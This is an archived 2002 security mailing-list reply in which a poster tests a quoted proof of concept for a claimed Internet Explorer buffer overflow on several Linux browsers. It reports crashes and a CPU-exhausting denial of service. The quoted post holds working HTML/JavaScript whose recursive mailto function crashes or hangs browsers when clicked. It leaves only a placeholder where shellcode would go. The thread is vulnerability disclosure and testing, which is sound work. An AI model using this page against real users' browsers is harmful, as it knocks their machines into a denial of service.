Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Scott Mackenzie (smackenzat_private)
Date: Sun Jun 02 2002 - 16:47:52 PDT

  • Next message: Muhammad Faisal Rauf Danka: "Re: Verizon Call Intercept"

    After a few minutes testing it seems this does not only effect Internet
    Explorer but also the following browsers:
    
    
    In KDE's konqueror Latest Version it Seg Faults the browser instantly
    
    In Mozilla 0.99 it causes a Denial of Service situation against the
    machine with 100% CPU usage, and some crazy hard drive accessing until
    the process is killed
    
    Other information:
    
    Netscape 6 series latest version does nothing when SMASH! is clicked
    
    Galeon latest tries to mail a rather long email address, but the browser
    itself is un-effected
    
    
    Test System:
    Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686 
    
    
    ---------------------------------
    Scott Mackenzie
    Cybernetics & Virtual Worlds (2)
    Bradford University
    http://smackenz.zapto.org
    ---------------------------------
    
    
    On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
    > the 28/07/1999 I have discovered a stack buffer overflow caused by until
    > the moment all the versions of the Internet Explorer.
    > In many windows98 causes the necessity to reinitiate the equipment, since
    > to my to seem it remains without memory.
    > Only it has been proven in several versions 5 of IE on WindowsNT
    > server sp6 and windows98 Second Edition.  As I said before the Windows 98
    > I had to reinitiate it to the force.
    > Can be possible to execute arbitrary code using the variable company of
    > the example?
    > 
    > // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
    > // internet Explorer 5.00.3500.1003 on Windows98se
    > 
    > -----------cut here---------------------------
    > <html><head></head>
    > <script language="JAVASCRIPT">
    > function hacerMail() {
    >   var company;
    > 
    >   crear();
    >   address="s0t4ipv6at_private";
    >   soporte();
    > }
    > function soporte(){
    >   var soporte="billat_private";
    >   window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    > // window.location=company;             // also this line cause the bof.
    >   close(hacerMail());
    > }
    > function crear(){
    > company="shellcode here?\n";            // i don't think so.
    > }
    > </script>
    >   <input type="button" onClick="hacerMail();" value="SMASH!"></input>
    > </html>
    > -----------cut here---------------------------
    > 
    > Regards.
    > 
    > - Internet es perjudicial para la salud -
    > - Ley N~ 127.0.0.1
    > 
    > Matias Sedalo 	
    > http://www.shellcode.com.ar
    > 
    > s0t4ipv6at_private
    > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
    > .......................................
    > 
    > 
    > 
    > 
    



    This archive was generated by hypermail 2b30 : Sun Jun 02 2002 - 17:30:23 PDT